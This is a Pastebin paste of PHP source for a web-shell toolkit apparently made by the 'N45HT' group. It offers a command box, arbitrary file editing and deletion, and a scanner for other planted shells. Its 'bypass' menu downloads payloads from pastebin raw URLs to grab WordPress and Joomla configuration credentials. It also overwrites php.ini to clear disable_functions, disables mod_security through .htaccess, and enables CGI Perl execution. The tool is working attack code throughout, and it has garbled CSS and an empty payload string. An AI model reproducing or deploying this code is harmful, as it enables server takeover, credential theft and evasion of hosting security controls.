Ribang

all bypaser

Feb 12th, 2018
524
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 47.20 KB | None | 0 0
  1. <head>
  2. <meta charset="utf-8">
  3. <meta name="viewport" content="width=device-width, initial-scale=1">
  4. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  5. <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  6.  
  7. <style>
  8. .wkwk {
  9. display: inline-block;
  10. padding: 6px 12px;
  11. margin-bottom: 0;
  12. font-size: 14px;
  13. font-weight: 400;
  14.  
  15. border:1px solid teal;
  16. text-align: center;
  17. white-space: nowrap;
  18. }
  19.  
  20. color:teal;
  21. }
  22. textarea {
  23. resize:none;
  24. }
  25. </style>
  26. </head>
  27. <center>
  28. <div class="container">
  29. <table width=76% align=center>
  30.  
  31. <tr>
  32.  
  33.  
  34. <?php
  35. @ini_set('display_errors', 0);
  36. function showdisablefunctions() {
  37. if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
  38. else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
  39. }
  40. $x = @php_uname();
  41. $d = showdisablefunctions().' <font color=white>on</font> <font color=teal>'.php_sapi_name().'</font>';
  42. $soft = getenv("SERVER_SOFTWARE");
  43. echo '
  44. <center><table width=76% align=center>
  45.  
  46. <th></th>
  47. <th></th>
  48. <tr>
  49. <td class="wkwk" align=right><font color=white>Software </font></td><td class="wkwk" align=left><font color=lavender> '.$soft.'</font></td></tr><tr>
  50. <td class="wkwk" align=right><font color=white>System OS </font></td><td class="wkwk" align=left><font color=lavender> '.$x.'</font></td></tr>
  51. <tr><td class="wkwk" align=right><font color=white>Disabled </font></td><td class="wkwk" align=left><font color=lavender> '.$d.'</font></td></tr>
  52.  
  53. </table>';
  54. ?>
  55. <br><br>
  56. </div>
  57. <div class="container">
  58. <form method="POST" action="">
  59. <font color=lime><b>Command :</b></font>
  60. <input type="text" placeholder="root@~N45HT!~" style="background:black;color:lavender;" class="wkwk" size="103" name="cmd">
  61. </form>
  62. <?php if(isset($_POST['cmd'])){
  63. $data = $_POST['cmd'];
  64. }
  65. ?>
  66. <br><br>
  67. </center>
  68. </div>
  69.  
  70. </body>
  71. </html>
  72. <?php
  73. //create By: Mr.x0x
  74. //And Greetz to :all Member N45HT
  75. ?>
  76. <script language="JavaScript" type="text/JavaScript">
  77. <!--
  78. function MM_openBrWindow(theURL,winName,features) { //v2.0
  79. window.open(theURL,winName,features)
  80. }
  81. //-->
  82. </script>
  83. <style type="text/css">
  84. <!--
  85. .single{
  86. border: 1px solid #00ff00;box-shadow: 0px 0px 15px red;
  87. padding: 5px;
  88. }
  89. .me {
  90. font-size:11px; font-family:Tahoma,Verdana,Arial; color:#ccff99;
  91. border: 0px;
  92. padding: 5px;
  93. }
  94.  
  95. .isi{
  96. padding: 2px;
  97. border:1px solid #666666;
  98. font-family: Tahoma;
  99. color: #ccff99;
  100. background-color: #666666;
  101. font-size: 10px;
  102. font-weight: bold;
  103. }
  104. -->
  105. </style>
  106. <style type="text/css">
  107. #patch {position:absolute; height:1; width:1px; top:0; left:0;}
  108. </style>
  109. </head>
  110. <body>
  111. <center>
  112. <?php
  113. if(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
  114. if(isset($_POST['yes'])){
  115. $filename = $_GET['file'];
  116. echo "<br><br><br><font color=red size=3><b><center>".$filename." deleted...</b></font><br><br><br><br><br><br><br>";
  117. unlink($filename);
  118. echo "<META HTTP-EQUIV=Refresh CONTENT=\"2; URL=javascript:window.close();\">";
  119. }else{
  120. if($_POST['update']) {
  121. $filename = $_POST['file'];
  122. if(is_writable($filename)) {
  123. $handle = fopen($filename, "w+");
  124. $isi=$_POST['content'];
  125. fwrite($handle, stripslashes($isi));
  126. fclose($handle);
  127. $stat= "<center><strong>edited successfully<br>";
  128. } else {
  129. $stat= "<center><font color=red><strong>Error! File may not be writable.</font></center>";
  130. }
  131. }
  132. if($_POST['close']) {
  133. echo "<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=javascript:window.close();\">";
  134. }
  135. $filename = $_GET['file'];
  136. if (file_exists($filename)){
  137. $vuln = $_GET['bug'];
  138. $handle = fopen($filename, "r");
  139. $contents = fread($handle, filesize($filename));
  140. ?>
  141. <center>
  142. <table>
  143. <tr><td align="left" class="me"><strong><?=$filename?>&nbsp;&nbsp;>> Contains :&nbsp;<?=$vuln?></strong></td></tr>
  144. <tr><td class="me">
  145. <form method="post" action="">
  146. <input type="hidden" name="file" value="<?=$filename?>">
  147. <textarea name="content" cols="80" rows="15"><?=htmlspecialchars($contents)?></textarea><br>
  148. </td></tr>
  149. <tr><td align="center" class="me">
  150. <?php
  151. if($_POST['delete']) {
  152. echo "Are you sure to delete ".$filename." ?";
  153. ?>
  154. <tr><td align="center" class="me">
  155. <input type="submit" name="yes" value=" Y E S ">
  156. <input type="submit" name="no" value=" N O ">
  157. </td></tr>
  158. <?php
  159. }else{
  160. echo $stat;
  161. ?>
  162. </td></tr>
  163. <tr><td align="right" class="me">
  164. <input type="submit" name="close" value=" C l o s e ">
  165. <input type="submit" name="delete" value=" D e l e t e ">
  166. <input type="submit" name="update" value=" S a v e ">
  167. </td></tr>
  168. <?php
  169. }
  170. fclose($handle);
  171. ?>
  172. </table>
  173. </form>
  174. <?php
  175. }else{
  176. echo "<br><br><br><font color=red size=3><b><center>".$filename." not exist...</b></font><br><br><br><br><br><br><br>";
  177. echo "<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
  178. }
  179. ?>
  180. </center>
  181. <?php
  182. }
  183. }elseif(isset($_POST['Submit'])){
  184. $ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  185. foreach($ceks as $ceker){
  186. if(@$_POST[$ceker]<>""){
  187. @$six.=$_POST[$ceker].".";
  188. }
  189. }
  190.  
  191. @$cek = explode('.', $six);
  192.  
  193. function ListFiles($dir) {
  194. if($dh = opendir($dir)) {
  195.  
  196. $files = Array();
  197. $inner_files = Array();
  198.  
  199. while($file = readdir($dh)) {
  200. if($file != "." && $file != "..") {
  201. if(is_dir($dir . "/" . $file)) {
  202. $inner_files = ListFiles($dir . "/" . $file);
  203. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  204. } else {
  205. array_push($files, $dir . "/" . $file);
  206. }
  207. }
  208. }
  209.  
  210. closedir($dh);
  211. return $files;
  212. }
  213. }
  214. ?>
  215. <center>
  216. <table border="0" width="90%" cellpadding="5">
  217. <tr>
  218. <td align="right" width="30"><b>No</b></td>
  219. <td align="center" width="105"><b> T y p e </b></td>
  220. <td align="center"><b> F i l e&nbsp;&nbsp;L o c a t i o n </b></td>
  221. <td align="center" width="150"><b> L a s t&nbsp;&nbsp;E d i t </b></td>
  222. <td align="right" width="80"><b>F i l e&nbsp;&nbsp;S i z e</b></td>
  223. </tr><br>
  224. <?php
  225. $target=$_SERVER['DOCUMENT_ROOT'];
  226. foreach (ListFiles($target) as $key=>$file){
  227. $nFile = substr($file, -4, 4);
  228. if($nFile == ".php"){
  229. if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
  230. }else{
  231. $ops = @file_get_contents($file);
  232. $op=strtolower($ops);
  233. $arr = array('c99_buff_prepare' => 'c 9 9',
  234. 'abcr57' => 'r 5 7');
  235. $sis=0;
  236. if($op)
  237. $size=filesize($file);
  238.  
  239. @$last=date("M-d-Y H:i", $last_modified);
  240. foreach($arr as $key => $val) {
  241. if(@preg_match("/$key/", $op)) {
  242. $sis=1;
  243. @$i++;
  244. ?>
  245. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  246. <td align="right"><font color="red"><blink><?=$i?></blink></font></td>
  247. <td align="center"><font color="red"><blink><?=$val?></blink></font></td>
  248. <td align="left"><blink>
  249. <a href="#" class="abunai" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  250. </blink></td>
  251. <td align="center"><font color="red"><blink><?=$last?> GMT+9</blink></font></td>
  252. <td align="right"><font color="red"><blink><?=$size?> byte</blink></font></td>
  253. <script language="javascript">
  254. var bgcolor = "transparent";
  255. var change_color = "#444444"
  256. function mover(aa) {
  257. aa.style.backgroundColor = change_color;
  258. }
  259. function mout(aa) {
  260. aa.style.backgroundColor = bgcolor;
  261. }
  262. </script>
  263. </tr>
  264. <?php
  265. }
  266. }
  267. if($sis<>"1"){
  268. if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) {
  269. $sis="2";
  270. $i++;
  271. $val="hidden shell";
  272. ?>
  273. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  274. <td align="right"><font color="Lavenda"><?=$i?></font></td>
  275. <td align="center"><font color="Lavenda"><?=$val?></font></td>
  276. <td align="left">
  277. <a href="#" class="xxx" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  278. </td>
  279. <td align="center"><font color="Lavenda"><?=$last?> GMT+9</font></td>
  280. <td align="right"><font color="Lavenda"><?=$size?> byte</font></td>
  281. <script language="javascript">
  282. var bgcolor = "transparent";
  283. var change_color = "#444444"
  284. function mover(aa) {
  285. aa.style.backgroundColor = change_color;
  286. }
  287. function mout(aa) {
  288. aa.style.backgroundColor = bgcolor;
  289. }
  290. </script>
  291. </tr>
  292. <?php
  293. }
  294. }
  295. if($sis=="0"){
  296. foreach($cek as $bugs) {
  297. if ($bugs<>""){
  298. if(@preg_match("/$bugs\((.*?)\)/", $op)) {
  299. $i++;
  300. ?>
  301. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  302. <td align="right"><?=$i?></td>
  303. <td align="center"><?=$bugs?></td>
  304. <td align="left">
  305. <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$bugs?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  306. </td>
  307. <td align="center"><?=$last?> GMT+9</td>
  308. <td align="right"><?=$size?> byte</td>
  309. <script language="javascript">
  310. var bgcolor = "transparent";
  311. var change_color = "#191919"
  312. function mover(aa) {
  313. aa.style.backgroundColor = change_color;
  314. }
  315. function mout(aa) {
  316. aa.style.backgroundColor = bgcolor;
  317. }
  318. </script>
  319. </tr>
  320. <?php
  321. }
  322. }
  323. }
  324. }
  325. if(@$_POST['textV']<>""){
  326. $text=$_POST['textV'];
  327. if(@preg_match("/$text/", $op)) {
  328. $i++;
  329. ?>
  330. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  331. <td align="right"><?=$i?></td>
  332. <td align="center"><?=$text?></td>
  333. <td align="left">
  334. <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$text?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  335. </td>
  336. <td align="center"><?=$last?> GMT+9</td>
  337. <td align="right"><?=$size?> byte</td>
  338. <script language="javascript">
  339. var bgcolor = "transparent";
  340. var change_color = "#444444"
  341. function mover(aa) {
  342. aa.style.backgroundColor = change_color;
  343. }
  344. function mout(aa) {
  345. aa.style.backgroundColor = bgcolor;
  346. }
  347. </script>
  348. </tr>
  349. <?php
  350. }
  351.  
  352.  
  353. }
  354. }
  355. }
  356. }
  357. if($i==0){
  358. foreach($cek as $bugs) {
  359. if ($bugs<>""){
  360. $x++;
  361. ?>
  362. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  363. <td align="right"><?=$x?></td>
  364. <td align="center"><?=$bugs?></td>
  365. <td align="center"> not exist </td>
  366. <td align="center"> no record </td>
  367. <td align="right"> -&nbsp;&nbsp;&nbsp;&nbsp;byte </td>
  368. </tr>
  369. <?php
  370. }
  371. }
  372. }
  373. ?>
  374. </table>
  375. <?php
  376. }else{
  377. $find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  378. ?>
  379. <form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
  380. <center>
  381. <table class="single" width="400" border="1" -webkit-box-shadow: 0px 0px 15px #55FF55; cellpadding="10">
  382. <tr><td class="me"><center>
  383.  
  384. <table class="me" width="200">
  385. <tr><td class="me">
  386. <script language="javascript">
  387. function cekKlik(){
  388. if (!document.fCheck.cekV.checked)
  389. document.fCheck.textV.disabled=true;
  390. else
  391. document.fCheck.textV.disabled=false;
  392. if(document.fCheck.cekV.checked){
  393. master = master + 1;
  394. }else{
  395. if(master > 0 ){
  396. master = master - 1;
  397. }else{
  398. master = master;
  399. }
  400. }
  401. if(master != 0){
  402. document.fCheck.Submit.disabled=false;
  403. }else{
  404. document.fCheck.Submit.disabled=true;
  405. }
  406. }
  407. </script>
  408. <?php
  409. //dari sini
  410. foreach($find as $bug) {
  411. ?>
  412. <script language="javascript">
  413. var master = 0;
  414. function checkValue<?=$bug?>(){
  415. if(document.fCheck.<?=$bug?>.checked){
  416. master = master + 1;
  417. }else{
  418. if(master > 0 ){
  419. master = master - 1;
  420. }else{
  421. master = master;
  422. }
  423. }
  424. if(master != 0){
  425. document.fCheck.Submit.disabled=false;
  426. }else{
  427. document.fCheck.Submit.disabled=true;
  428. }
  429. }
  430. </script>
  431. <input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" />&nbsp;<?=$bug?><br>
  432. <?php
  433. }
  434. ?>
  435. <input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
  436. <input class="isi" disabled="disabled" name="textV" value="other key word" onFocus="this.select()" type="text" id="textV">
  437. <br><br>
  438. <input type="hidden" name="asal" value="abcd">
  439. <input disabled="disabled" type="submit" name="Submit" value=" Start " />
  440. </td></tr>
  441. </table>
  442. </td></tr></table>
  443. </form>
  444. <?php
  445. }
  446. ?>
  447. <br><br><hr width="300">
  448. <?php
  449. function parah($pastebin, $nama_file){
  450. $usa = file_get_contents("$pastebin");
  451. $frr = fopen("$nama_file", 'w');
  452. fwrite($frr, $usa);
  453. }
  454. $xp = @$_GET['xp'];
  455. if($xp == "byppasssym"){
  456. mkdir('symlink');
  457. $config = parah("http://pastebin.com/raw/BgDjxQfu", "symlink/.htaccess");
  458. echo '<center><font color =red><a href="symlink/.htaccess" target="_blank">Config Grabber Wordpress dan joomla</a><br></font></center>';
  459. }
  460. elseif($xp == "bypassdisable"){
  461. $dir = getcwd();
  462. $isi = 'safe_mode = off
  463. disable_functions = NONE';
  464. $buka = fopen($dir.'/php.ini', 'w');
  465. fwrite($buka, $isi);
  466.  
  467. $b = '<h2><a href="php.ini" target="_blank">Succes Bypass Disabled Functions</a></h2><br>
  468. klik link tsb.';
  469.  
  470. }
  471. elseif($xp == "cgipl"){
  472. mkdir('cgipl', 0755);
  473. chdir('cgipl');
  474. $kokdosya = ".htaccess";
  475. $dosya_adi = "$kokdosya";
  476. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  477. $metin = "AddType application/x-httpd-cgi .root
  478. AddType application/x-httpd-cgi .root
  479. AddHandler cgi-script .root
  480. AddHandler cgi-script .root";
  481. fwrite ( $dosya , $metin ) ;
  482. fclose ($dosya);
  483. $cgipl = '';
  484.  
  485. $file = fopen("vw.root" ,"w+");
  486. $write = fwrite ($file ,base64_decode($cgipl));
  487. fclose($file);
  488. chmod("vw.root",0755);
  489.  
  490. echo '<center><font color =lavenda><a href="cgipl/" target="_blank">Sukses Create File CGIPL</a><br></font></center>
  491. </div>';
  492. }
  493. elseif($xp == "bypassdisablemod"){
  494. $dir = getcwd();
  495. $isi = '<IfModule mod_security.c>
  496. SecFilterEngine Off
  497. SecFilterScanPOST Off
  498. </IfModule>';
  499. $buka = fopen($dir.'/.htaccess', 'w');
  500. fwrite($buka, $isi);
  501. echo '<center><font color =red><a href="symlink/.htaccess" target="_blank">Succes Bypass Mod Security </a><br></font></center>';
  502. }
  503. elseif($xp == "vhost"){
  504. mkdir('vhost');
  505. $config = parah("http://pastebin.com/raw/1avpaPGS", "vhost/.htaccess");
  506. $config = parah("http://pastebin.com/raw/PMt2aia6", "vhost/vhost.cin");
  507. echo '<center><font color =red><a href="vhost/vhost.cin" target="_blank">Config Grabber Wordpress dan joomla</a><br></font></center>';
  508. }
  509. echo '<!DOCTYPE html>
  510. <html>
  511. <head>
  512. <title>N45HT</title>
  513.  
  514. <style>
  515. html {
  516. background-color: #000000;
  517. -webkit-background-size: cover;
  518. -moz-background-size: cover;
  519. -o-background-size: cover;
  520. background-size: cover;
  521. }
  522. a{
  523. text-decoration: none;
  524. }
  525. a:hover{
  526. color: white;
  527. }
  528. .kotak{
  529. padding: 2px;
  530. font-family: Tahoma;
  531. background-color: silver;
  532. font-size: 10px;
  533. font-weight: bold;
  534. }
  535. #com{
  536. margin-right: 120px;
  537. display: inline;
  538. }
  539. .kotak {
  540. padding:2px 7px;
  541. text-decoration: none;
  542. letter-spacing: 2px;
  543. border-radius: 3px;
  544. border-center:3x;
  545. width: 200px;
  546. height: 20px;
  547. display: inline;
  548.  
  549. padding: 5px;
  550.  
  551. }
  552. table.info{ color:#000;background-color:#191919; }
  553. input,textarea,select{ margin:0;color:#999;background-color:#ffff;border:1px solid $color; font: 8pt Tahoma,; }
  554. form{ margin:0px; }
  555. #textarea {
  556. background-color: #000000;
  557. -moz-border-radius: 15px;
  558. -webkit-border-radius: 15px;
  559. border: 1px solid #00ff00;box-shadow: 0px 0px 15px Lavenda;
  560. border: 1px solid #FF0000;
  561. padding: 5px; color:#FF0000
  562. }
  563.  
  564. </style>
  565. </head>
  566. <br>
  567. </p>
  568. </span>
  569. </form><hr>
  570. <div class="kotak"><a href="?xp=byppasssym">Bypass Symlink Internal Server</a></div>
  571. <div class="kotak"><a href="?xp=bypassdisable">Bypass Disabled Functions Server</a></div>
  572. <div class="kotak"><a href="?xp=bypassdisablemod">Bypass Mod Security Server</a></div>
  573. <div class="kotak"><a href="?xp=vhost">Virtual Hosting</a></div>
  574. <div class="kotak"><a href="?xp=cgipl">Bypass Perl Security</a></div><center><hr>';
  575.  
  576. ?>
Add Comment
Please, Sign In to add comment